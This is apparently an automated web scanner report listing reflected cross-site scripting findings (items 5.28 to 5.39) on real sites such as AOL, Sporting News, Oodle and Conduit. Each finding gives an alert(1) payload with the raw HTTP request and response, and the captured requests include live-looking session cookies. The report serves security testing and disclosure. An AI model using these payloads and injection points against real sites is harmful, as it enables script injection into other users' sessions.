Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/14302-119028-16279-0?mpt=557124584&mpvc=http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=&f41e2'%3balert(1)//ab4d8722cb9=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/14302:29115/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=14302:16279/10105:1629/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/13198:5934/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209; expires=Sat, 4-May-2013 4:39:09 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 633
Date: Thu, 05 May 2011 01:00:23 GMT

document.write('<a target="_blank" href="http://at.atwola.com/adlink/5113/1838206/0/6/AdId=1587052;BnId=1;itime=557124584;kvpg=techcrunch;kvugc=0;kvmn=93311128;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:56148:57362:56673:56835:60203:51186:56780:50220:56768:56299:56987:56969:54057:50229:54063:57144;nodecode=yes;link=&f41e2';alert(1)//ab4d8722cb9=1http://altfarm.mediaplex.com/ad/ck/14302-119028-16279-0?mpt=557124584">
...[SNIP]...

5.28. http://aol.sportingnews.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f16ea"><script>alert(1)</script>3359d04778d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f16ea"><script>alert(1)</script>3359d04778d=1 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044482-New%7C1367647044482%3B%20s_nrgvo%3DNew%7C1367647044484%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_cc=true; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
X-N: S
Cache-Control: max-age=30
Date: Thu, 05 May 2011 00:58:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 105579

<!DOCTYPE html>

<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html class="n
...[SNIP]...
<meta property="og:url" content="http://www.sportingnews.com/?f16ea"><script>alert(1)</script>3359d04778d=1" />
...[SNIP]...

5.29. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [body-class parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /iframe-widgets/feed/accordion.php

Issue detail

The value of the body-class request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f8b"><script>alert(1)</script>775d746b45d was submitted in the body-class parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe-widgets/feed/accordion.php?body-class=homepage20f8b"><script>alert(1)</script>775d746b45d HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:58:00 GMT
Cache-Control: max-age=60
Date: Thu, 05 May 2011 00:58:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10973

<!DOCTYPE html>
<html class="accordion-iframe" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<body class="homepage20f8b"><script>alert(1)</script>775d746b45d">
...[SNIP]...

5.30. http://aol.sportingnews.com/iframe-widgets/feed/accordion.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /iframe-widgets/feed/accordion.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c506"><script>alert(1)</script>03731420e7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe-widgets/feed/accordion.php?body-class=home/7c506"><script>alert(1)</script>03731420e7cpage HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:58:00 GMT
Cache-Control: max-age=60
Date: Thu, 05 May 2011 00:58:31 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 10974

<!DOCTYPE html>
<html class="accordion-iframe" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<body class="home/7c506"><script>alert(1)</script>03731420e7cpage">
...[SNIP]...

5.31. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The value of the dimension request parameter is copied into the HTML document as plain text between tags. The payload 39601<script>alert(1)</script>ba982c7c28d was submitted in the dimension parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x15039601<script>alert(1)</script>ba982c7c28d&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:55:00 GMT
Cache-Control: max-age=283
Date: Thu, 05 May 2011 00:59:01 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4829

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-size:11px; color:#000; }
#fs { display:block; width:180px; height:15039601<script>alert(1)</script>ba982c7c28dpx; overflow:hidden; background:url(http://st.snimg.com/image/promos/fantasy-source/mlb-ad-bg-180x15039601<script>
...[SNIP]...

5.32. http://aol.sportingnews.com/services/fantasy_source_rankings_ad.php [dimension parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://aol.sportingnews.com
Path:   /services/fantasy_source_rankings_ad.php

Issue detail

The value of the dimension request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9e5"><script>alert(1)</script>0234b75261d was submitted in the dimension parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/fantasy_source_rankings_ad.php?sport=mlb&dimension=180x150aa9e5"><script>alert(1)</script>0234b75261d&limit=3 HTTP/1.1
Host: aol.sportingnews.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _opt_vi_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vs_QE5LN8SC=368D19B4-8DEB-4919-A057-115DCC68C99B; _opt_vt_QE5LN8SC=E24C126469; s_eVar23=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; _chartbeat2=k7ko2yyxre4ltbnt; s_pers=%20s_getnr%3D1304575073218-New%7C1367647073218%3B%20s_nrgvo%3DNew%7C1367647073220%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html
Last-Modified: 05 May 2011 00:55:00 GMT
Cache-Control: max-age=300
Date: Thu, 05 May 2011 00:59:00 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 4851

<script language="javascript" type="text/javascript" src="http://st.snimg.com/js/omniture.js"></script>
<style>
body, #fs * { margin:0; padding:0; line-height:1em; font-family:arial,sans-serif; font-s
...[SNIP]...
<div id="fs" class="ad-180x150aa9e5"><script>alert(1)</script>0234b75261d">
...[SNIP]...

5.33. http://apartments.rentedspaces.oodle.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.rentedspaces.oodle.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b68bb"><script>alert(1)</script>17755f1e103 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b68bb"><script>alert(1)</script>17755f1e103=1 HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: Ym9uZXM=
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 10:52:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=2185e70315ab611df10e714ffdfebac5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=b8aabdc0f23d046c06b479adb5ae1264; path=/; domain=.oodle.com
Set-Cookie: a=dT1EMjEwMzc1MjREQzI4MTgy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NTkyNzcwO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 216655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/?b68bb"><script>alert(1)</script>17755f1e103=1" />
...[SNIP]...

5.34. http://apartments.rentedspaces.oodle.com/ [post_redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apartments.rentedspaces.oodle.com
Path:   /

Issue detail

The value of the post_redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d1e"><script>alert(1)</script>0a65c36f3ad was submitted in the post_redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?post_redirect=193d1e"><script>alert(1)</script>0a65c36f3ad HTTP/1.1
Host: apartments.rentedspaces.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
X-ODL-Server: c3VsdQ==
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Thu, 05 May 2011 13:03:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: otu=228eb9f281eb0d14a0310b873592e387; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=0831ab39f0c8bd5528ecac12eea81fe6; path=/; domain=.oodle.com
Set-Cookie: a=dT1ENzc5QTI2RjREQzJBMDE2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjEyOiJyZW50ZWRzcGFjZXMiO3M6MTI6InJlbnRlZHNwYWNlcyI7czoxMDoiX3RpbWVzdGFtcCI7aToxMzA0NjAwNTk4O30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo2OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7TjtzOjc6ImNvdW50cnkiO3M6MzoiVVNBIjtzOjk6InJlZ2lvbl9pZCI7czozOiIzMDQiO3M6OToiY2l0eV9jb2RlIjtOO3M6Njoib3JpZ2luIjtzOjU6ImNhY2hlIjt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Content-Length: 222672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://apartments.oodle.com/?post_redirect=193d1e"><script>alert(1)</script>0a65c36f3ad" />
...[SNIP]...

5.35. http://api.screenname.aol.com/auth/getToken [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 54dab<script>alert(1)</script>4f3d94004bb was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ao17McU4gORZ7DqV&attributes=displayName,loginId,profileUrl,pictureUrl,providerStr,providerDisplayName&f=json&c=jsonp130457501134354dab<script>alert(1)</script>4f3d94004bb HTTP/1.1
Host: api.screenname.aol.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/radioguide/bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575010062-Repeat%7C1367647010062%3B%20s_nrgvo%3DRepeat%7C1367647010064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:59 GMT
Set-Cookie: JSESSIONID=786625853431F338BA8AD4E06AC98398; Path=/auth
Set-Cookie: OASC=diAxLjAgayAwIFpoakMzOGxtK2l2TTREVGhxaVlnSE8vdVhtTT0%3D-SSQdmqasJXW7AratTMW0EY3204%2BolSyJ67U1vJszd1noF40Fu%2FJMgOz%2FgzlQ4T4HfJQB7UBTF4I%3D; Path=/; HTTPOnly
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 130

jsonp130457501134354dab<script>alert(1)</script>4f3d94004bb({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

5.36. https://api.screenname.aol.com/auth/getToken [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 2c3af<script>alert(1)</script>07af1547688 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /auth/getToken?devId=ru1m1hWVLRPqEkwX&f=json&c=doGetToken.gotToken2c3af<script>alert(1)</script>07af1547688 HTTP/1.1
Host: api.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; JSESSIONID=BBF9B7FB9E26D8ED033DC7F99C6FF372; s_pers=%20s_getnr%3D1304617160633-Repeat%7C1367689160633%3B%20s_nrgvo%3DRepeat%7C1367689160634%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; OASC=diAxLjAgayAwIEtka21Cc09VUUtRRGRQRCtGZ1lUMG9KeWU5OD0%3D-SSQdmqasJXW7AratTMW0EQEWTMe1VUR5nhDclcT%2FxS5anlWsRZrQQVYOAITNhFUURd6bocJQ7JlhxqVytjSx4wPs6vBqi04y; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 13:01:47 GMT
Set-Cookie: JSESSIONID=1B31EE08F46C7362825E10413449A1AA; Path=/auth; Secure
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Connection: close

doGetToken.gotToken2c3af<script>alert(1)</script>07af1547688({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

5.37. http://apps.conduit-banners.com/TechCrunchApp-Techcrunch_APP [imageurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.conduit-banners.com
Path:   /TechCrunchApp-Techcrunch_APP

Issue detail

The value of the imageurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1dd1'%3balert(1)//12dd62a0907 was submitted in the imageurl parameter. This input was echoed as f1dd1';alert(1)//12dd62a0907 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TechCrunchApp-Techcrunch_APP?appid=0b9c9103-d379-409d-9edb-54745461fe64&script=togo&type=1&imageurl=http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.giff1dd1'%3balert(1)//12dd62a0907&supportedonly=1 HTTP/1.1
Host: apps.conduit-banners.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 05 May 2011 00:59:49 GMT
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 4680

function imgToGoOnLoad__1312324258(imgObj) {var elm = imgObj,func__1312324258 = function(){
SharedItems.Togo.Manager.createItem('0b9c9103-d379-409d-9edb-54745461fe64','','2523688','TechCrunch-Ap
...[SNIP]...
<img style="cursor: pointer; visibility: visible;" src="http://s2.wp.com/wp-content/themes/vip/tctechcrunch/images/conduit.giff1dd1';alert(1)//12dd62a0907" title="Grab an app for your browser" alt="Techcrunch News" border="0" onload="imgToGoOnLoad__1312324258(this);" >
...[SNIP]...

5.38. http://apps.conduit.com/TechCrunch_App-Techcrunch_News [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://apps.conduit.com
Path:   /TechCrunch_App-Techcrunch_News

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks: the src of a <script> element that points back at this same URL with script=1 and further parameters appended. The payload 4163b'a%3d'b'ed58c988a40 was submitted in REST URL parameter 1 and echoed as 4163b'a='b'ed58c988a40 in the application's response.

This shows that the quote closes the attribute and that new attributes can be injected into the script element; because the attribute is also the URL that element loads, the path decides which script on apps.conduit.com is fetched. The scanner did not find a payload that yields arbitrary JavaScript, so the application's behaviour should be examined manually for input validation or other obstacles that may be in place.

Request

GET /TechCrunch_App-Techcrunch_News4163b'a%3d'b'ed58c988a40?appid=0b9c9103-d379-409d-9edb-54745461fe64&source=8&displaytype=togo HTTP/1.1
Host: apps.conduit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:02:03 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Length: 15083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type='text/javascript' src='http://apps.conduit.com/TechCrunch_App-Techcrunch_News4163b'a='b'ed58c988a40?appid=0b9c9103-d379-409d-9edb-54745461fe64&source=8&displaytype=togo&script=1&loggeronly=1&itemsource=1'>
...[SNIP]...

5.39. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is used as the function name in a JSONP-style response and written, unmodified, as the first bytes of the script body, which is served as application/x-javascript. The payload f7d49<script>alert(1)</script>573fa588bae was submitted in the func parameter and echoed as-is, followed by ("");.

This shows that arbitrary text, script markup included, reaches the response unencoded. As with the screenname.aol.com callback in 5.36, the body is a script rather than an HTML document: the reflected tag only renders in a client that content-sniffs the response, and no X-Content-Type-Options: nosniff header is sent to stop that. Because func is emitted as code, whatever the parameter contains executes in any page that includes this URL as a script; the fix is an allow-list on the function name, not encoding.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractionf7d49<script>alert(1)</script>573fa588bae&n=ar_int_p97174789&1304575029874 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
